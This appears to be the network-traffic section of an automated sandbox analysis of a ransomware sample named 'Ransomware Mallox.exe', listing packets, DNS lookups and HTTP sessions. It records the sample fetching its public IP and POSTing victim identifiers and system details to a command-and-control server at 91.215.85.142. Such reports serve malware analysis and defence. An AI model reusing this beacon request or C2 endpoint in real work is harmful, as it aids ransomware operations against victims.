                    Nov 5, 2024 13:23:29.309870005 CET804980291.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:29.315087080 CET4980280192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:29.317025900 CET4980280192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:29.321901083 CET804980291.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:29.982965946 CET49801135192.168.2.10192.168.2.1
                    Nov 5, 2024 13:23:30.207827091 CET804980291.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:30.207921982 CET804980291.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:30.208228111 CET4980280192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:30.208266020 CET804980291.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:30.208334923 CET4980280192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:30.208461046 CET804980291.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:30.208476067 CET804980291.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:30.209033966 CET804980291.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:30.209048986 CET804980291.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:30.209060907 CET804980291.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:30.209278107 CET4980280192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:30.209841013 CET804980291.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:30.209857941 CET804980291.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:30.210649967 CET4980280192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:30.213175058 CET804980291.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:30.213802099 CET4980280192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:30.556864023 CET4980280192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:30.557324886 CET4980880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:30.562232971 CET804980291.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:30.562952042 CET804980891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:30.563081026 CET4980280192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:30.563152075 CET4980880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:30.564204931 CET4980880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:30.569106102 CET804980891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:31.452996016 CET804980891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:31.453157902 CET804980891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:31.453169107 CET804980891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:31.453639030 CET804980891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:31.453651905 CET804980891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:31.453663111 CET804980891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:31.454468012 CET804980891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:31.454484940 CET804980891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:31.454497099 CET804980891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:31.454916954 CET804980891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:31.457211971 CET4980880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:31.457212925 CET4980880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:31.658207893 CET4980880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:31.658639908 CET4981980192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:31.663558006 CET804980891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:31.664232969 CET4980880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:31.665179968 CET804981991.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:31.666894913 CET4981980192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:31.668910027 CET4981980192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:31.673722029 CET804981991.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:31.982666016 CET49801135192.168.2.10192.168.2.1
                    Nov 5, 2024 13:23:32.564013004 CET804981991.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:32.564100981 CET4981980192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:32.564126968 CET804981991.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:32.564172983 CET4981980192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:32.564302921 CET804981991.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:32.564352989 CET4981980192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:32.564657927 CET804981991.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:32.564671040 CET804981991.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:32.564683914 CET804981991.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:32.564707041 CET4981980192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:32.564732075 CET4981980192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:32.565442085 CET804981991.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:32.565454960 CET804981991.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:32.565465927 CET804981991.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:32.565500021 CET4981980192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:32.565526009 CET4981980192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:32.929366112 CET4981980192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:32.934808969 CET804981991.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:32.934876919 CET4981980192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:33.011660099 CET4982580192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:33.016654015 CET804982591.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:33.017076969 CET4982580192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:33.058063984 CET4982580192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:33.062889099 CET804982591.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:33.939791918 CET804982591.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:33.939842939 CET804982591.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:33.939855099 CET804982591.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:33.940294027 CET804982591.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:33.940306902 CET804982591.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:33.940319061 CET804982591.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:33.940696955 CET804982591.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:33.940707922 CET804982591.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:33.940720081 CET804982591.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:33.940732956 CET804982591.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:33.958950996 CET4982580192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:33.961663008 CET804982591.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:33.967681885 CET4982580192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:34.846077919 CET4982580192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:34.846649885 CET4983880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:34.851558924 CET804982591.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:34.851577997 CET804983891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:34.852926016 CET4982580192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:34.852952957 CET4983880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:34.853372097 CET4983880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:34.858238935 CET804983891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:35.756622076 CET804983891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:35.756815910 CET4983880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:35.756850958 CET804983891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:35.756906986 CET804983891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:35.756927013 CET4983880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:35.756963015 CET4983880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:35.757169008 CET804983891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:35.757181883 CET804983891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:35.757258892 CET4983880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:35.757625103 CET804983891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:35.757637024 CET804983891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:35.757707119 CET4983880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:35.758080959 CET804983891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:35.758093119 CET804983891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:35.758104086 CET804983891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:35.758163929 CET4983880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:35.758204937 CET4983880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:35.762063980 CET804983891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:35.762149096 CET4983880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:35.986083984 CET49801135192.168.2.10192.168.2.1
                    Nov 5, 2024 13:23:40.914869070 CET804983891.215.85.142192.168.2.10
                    Nov 5, 2024 13:23:40.914942980 CET4983880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:23:43.987787008 CET49801135192.168.2.10192.168.2.1
                    Nov 5, 2024 13:23:49.997534037 CET49926135192.168.2.10192.168.2.1
                    Nov 5, 2024 13:23:51.003370047 CET49926135192.168.2.10192.168.2.1
                    Nov 5, 2024 13:23:53.003400087 CET49926135192.168.2.10192.168.2.1
                    Nov 5, 2024 13:23:57.003334999 CET49926135192.168.2.10192.168.2.1
                    Nov 5, 2024 13:24:05.003283024 CET49926135192.168.2.10192.168.2.1
                    Nov 5, 2024 13:25:14.299917936 CET4983880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:25:14.299987078 CET4976980192.168.2.10104.26.12.205
                    Nov 5, 2024 13:25:14.305459023 CET8049769104.26.12.205192.168.2.10
                    Nov 5, 2024 13:25:14.305864096 CET4976980192.168.2.10104.26.12.205
                    Nov 5, 2024 13:25:14.612318993 CET4983880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:25:15.221592903 CET4983880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:25:16.424773932 CET4983880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:25:18.830984116 CET4983880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:25:23.643522024 CET4983880192.168.2.1091.215.85.142
                    Nov 5, 2024 13:25:33.252736092 CET4983880192.168.2.1091.215.85.142

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Nov 5, 2024 13:23:24.818913937 CET6363253192.168.2.101.1.1.1
                    Nov 5, 2024 13:23:24.825896025 CET53636321.1.1.1192.168.2.10
                    Nov 5, 2024 13:23:28.956908941 CET52551274192.168.2.10192.168.2.1
                    Nov 5, 2024 13:23:28.977669001 CET52551274192.168.2.10192.168.2.1
                    Nov 5, 2024 13:23:28.980178118 CET52551274192.168.2.10192.168.2.1
                    Nov 5, 2024 13:23:49.991449118 CET52551274192.168.2.10192.168.2.1
                    Nov 5, 2024 13:23:49.992461920 CET52551274192.168.2.10192.168.2.1
                    Nov 5, 2024 13:23:49.995754957 CET52551274192.168.2.10192.168.2.1
                    Nov 5, 2024 13:23:49.996659994 CET52551274192.168.2.10192.168.2.1
                    Nov 5, 2024 13:24:11.005496025 CET52551274192.168.2.10192.168.2.1
                    Nov 5, 2024 13:25:14.336812019 CET52551274192.168.2.10192.168.2.1

                    ICMP Packets

                    TimestampSource IPDest IPChecksumCodeType
                    Nov 5, 2024 13:23:28.956964016 CET192.168.2.1192.168.2.108319(Port unreachable)Destination Unreachable
                    Nov 5, 2024 13:23:28.977713108 CET192.168.2.1192.168.2.108319(Port unreachable)Destination Unreachable
                    Nov 5, 2024 13:23:28.980190039 CET192.168.2.1192.168.2.108319(Port unreachable)Destination Unreachable
                    Nov 5, 2024 13:23:28.981630087 CET192.168.2.1192.168.2.10827f(Port unreachable)Destination Unreachable
                    Nov 5, 2024 13:23:29.983098984 CET192.168.2.1192.168.2.10827f(Port unreachable)Destination Unreachable
                    Nov 5, 2024 13:23:31.982716084 CET192.168.2.1192.168.2.10827f(Port unreachable)Destination Unreachable
                    Nov 5, 2024 13:23:35.986140013 CET192.168.2.1192.168.2.10827f(Port unreachable)Destination Unreachable
                    Nov 5, 2024 13:23:43.987843037 CET192.168.2.1192.168.2.10827f(Port unreachable)Destination Unreachable
                    Nov 5, 2024 13:23:49.991482973 CET192.168.2.1192.168.2.108315(Port unreachable)Destination Unreachable
                    Nov 5, 2024 13:23:49.992472887 CET192.168.2.1192.168.2.108315(Port unreachable)Destination Unreachable
                    Nov 5, 2024 13:23:49.995762110 CET192.168.2.1192.168.2.108315(Port unreachable)Destination Unreachable
                    Nov 5, 2024 13:23:49.996665001 CET192.168.2.1192.168.2.108315(Port unreachable)Destination Unreachable
                    Nov 5, 2024 13:23:49.997575045 CET192.168.2.1192.168.2.10827f(Port unreachable)Destination Unreachable
                    Nov 5, 2024 13:23:51.003411055 CET192.168.2.1192.168.2.10827f(Port unreachable)Destination Unreachable
                    Nov 5, 2024 13:23:53.003458023 CET192.168.2.1192.168.2.10827f(Port unreachable)Destination Unreachable
                    Nov 5, 2024 13:23:57.003372908 CET192.168.2.1192.168.2.10827f(Port unreachable)Destination Unreachable
                    Nov 5, 2024 13:24:05.003345966 CET192.168.2.1192.168.2.10827f(Port unreachable)Destination Unreachable
                    Nov 5, 2024 13:24:11.005553007 CET192.168.2.1192.168.2.108315(Port unreachable)Destination Unreachable
                    Nov 5, 2024 13:25:14.336863995 CET192.168.2.1192.168.2.108315(Port unreachable)Destination Unreachable

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Nov 5, 2024 13:23:24.818913937 CET192.168.2.101.1.1.10x11feStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Nov 5, 2024 13:23:11.976799011 CET1.1.1.1192.168.2.100xb600No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                    Nov 5, 2024 13:23:11.976799011 CET1.1.1.1192.168.2.100xb600No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                    Nov 5, 2024 13:23:24.825896025 CET1.1.1.1192.168.2.100x11feNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                    Nov 5, 2024 13:23:24.825896025 CET1.1.1.1192.168.2.100x11feNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                    Nov 5, 2024 13:23:24.825896025 CET1.1.1.1192.168.2.100x11feNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • api.ipify.org
                    • 91.215.85.142

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.1049769104.26.12.205807740C:\Users\user\Desktop\Ransomware Mallox.exe
                    TimestampBytes transferredDirectionData
                    Nov 5, 2024 13:23:24.837909937 CET137OUTGET / HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: api.ipify.org
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Nov 5, 2024 13:23:25.543059111 CET407INHTTP/1.1 200 OK
                    Date: Tue, 05 Nov 2024 12:23:25 GMT
                    Content-Type: text/plain
                    Content-Length: 14
                    Connection: keep-alive
                    Vary: Origin
                    cf-cache-status: DYNAMIC
                    Server: cloudflare
                    CF-RAY: 8ddcd09fc92d2d29-DFW
                    server-timing: cfL4;desc="?proto=TCP&rtt=1143&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=137&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                    Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36
                    Data Ascii: 173.254.250.76


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.104978191.215.85.142807740C:\Users\user\Desktop\Ransomware Mallox.exe
                    TimestampBytes transferredDirectionData
                    Nov 5, 2024 13:23:26.198463917 CET334OUTPOST /QWEwqdsvsf/ap.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 91.215.85.142
                    Content-Length: 158
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 39 30 31 32 45 30 34 46 32 43 34 39 32 37 36 30 37 46 41 35 36 41 39 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 50 72 6f 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 2c 25 32 30 36 35 31 36 38 39 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 32 32 30
                    Data Ascii: user=panda&TargetID=9012E04F2C4927607FA56A90&SystemInformation=Windows%2010%20Pro%20x64,%20CH,%20173.254.250.76,%20651689&max_size_of_file=0.0&size_of_hdd=220
                    Nov 5, 2024 13:23:27.088351011 CET1236INHTTP/1.1 404 Not Found
                    Date: Tue, 05 Nov 2024 12:23:26 GMT
                    Server: Apache
                    Accept-Ranges: bytes
                    Cache-Control: no-cache, no-store, must-revalidate
                    Pragma: no-cache
                    Expires: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Transfer-Encoding: chunked
                    Content-Type: text/html
                    Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                    Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .r
                    Nov 5, 2024 13:23:27.088594913 CET212INData Raw: 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20
                    Data Ascii: esponse-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; }
                    Nov 5, 2024 13:23:27.089068890 CET1236INData Raw: 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20
                    Data Ascii: .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additiona
                    Nov 5, 2024 13:23:27.089334011 CET1236INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 61 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74
                    Data Ascii: text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align: center; margin: 60
                    Nov 5, 2024 13:23:27.089859962 CET1236INData Raw: 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20
                    Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom
                    Nov 5, 2024 13:23:27.089871883 CET1236INData Raw: 59 33 38 6d 6c 76 58 4b 44 64 55 35 70 44 48 33 54 52 6b 6c 34 30 76 78 4a 6b 5a 2b 44 4f 32 4e 75 2f 33 48 6e 79 43 37 74 31 35 6f 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63
                    Data Ascii: Y38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20Yfi
                    Nov 5, 2024 13:23:27.090830088 CET1236INData Raw: 63 6b 69 51 35 5a 4f 55 7a 6c 43 4f 4d 79 69 39 5a 2b 4c 58 52 45 68 53 35 69 71 72 49 34 51 6e 75 4e 6c 66 38 6f 56 45 62 4b 38 41 35 35 36 51 51 4b 30 4c 4e 72 54 6a 32 74 69 57 66 63 46 6e 68 30 68 50 49 70 59 45 56 47 6a 6d 42 41 65 32 62 39
                    Data Ascii: ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMr
                    Nov 5, 2024 13:23:27.090842009 CET1236INData Raw: 4b 59 55 49 6e 6a 70 6b 52 63 65 63 57 66 6b 45 6d 64 43 41 65 68 67 75 65 75 54 6d 4e 74 2b 73 68 6b 52 65 4b 64 33 76 36 37 6e 50 39 63 4e 44 4a 48 76 6f 44 2b 2b 78 64 76 70 6f 76 58 4b 43 70 35 53 66 6f 47 78 48 73 6a 30 79 46 2b 49 77 48 55
                    Data Ascii: KYUInjpkRcecWfkEmdCAehgueuTmNt+shkReKd3v67nP9cNDJHvoD++xdvpovXKCp5SfoGxHsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94
                    Nov 5, 2024 13:23:27.091964960 CET1236INData Raw: 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 0d 0a 38 38 0d 0a 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20
                    Data Ascii: <span class="status-reason">88Not Found</span> </section> <section class="contact-info"> Please forward this error screen to 2091.215.85.142's <a href="mailto:36root@91-215-85-142.cprapid.c
                    Nov 5, 2024 13:23:27.091976881 CET435INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 70 61 6e 65 6c 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 63 70 61 6e 65 6c 77 68 6d 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26
                    Data Ascii: <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=131404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height=


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.104978891.215.85.142807740C:\Users\user\Desktop\Ransomware Mallox.exe
                    TimestampBytes transferredDirectionData
                    Nov 5, 2024 13:23:27.400510073 CET334OUTPOST /QWEwqdsvsf/ap.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 91.215.85.142
                    Content-Length: 158
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                    Data Raw: 75 73 65 72 3d 70 61 6e 64 61 26 54 61 72 67 65 74 49 44 3d 39 30 31 32 45 30 34 46 32 43 34 39 32 37 36 30 37 46 41 35 36 41 39 30 26 53 79 73 74 65 6d 49 6e 66 6f 72 6d 61 74 69 6f 6e 3d 57 69 6e 64 6f 77 73 25 32 30 31 30 25 32 30 50 72 6f 25 32 30 78 36 34 2c 25 32 30 43 48 2c 25 32 30 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 2c 25 32 30 36 35 31 36 38 39 26 6d 61 78 5f 73 69 7a 65 5f 6f 66 5f 66 69 6c 65 3d 30 2e 30 26 73 69 7a 65 5f 6f 66 5f 68 64 64 3d 32 32 30
                    Data Ascii: user=panda&TargetID=9012E04F2C4927607FA56A90&SystemInformation=Windows%2010%20Pro%20x64,%20CH,%20173.254.250.76,%20651689&max_size_of_file=0.0&size_of_hdd=220
                    Nov 5, 2024 13:23:28.270083904 CET1236INHTTP/1.1 404 Not Found
                    Date: Tue, 05 Nov 2024 12:23:28 GMT
                    Server: Apache
                    Accept-Ranges: bytes
                    Cache-Control: no-cache, no-store, must-revalidate
                    Pragma: no-cache
                    Expires: 0
                    Keep-Alive: timeout=5, max=100
                    Connection: Keep-Alive
                    Transfer-Encoding: chunked
                    Content-Type: text/html
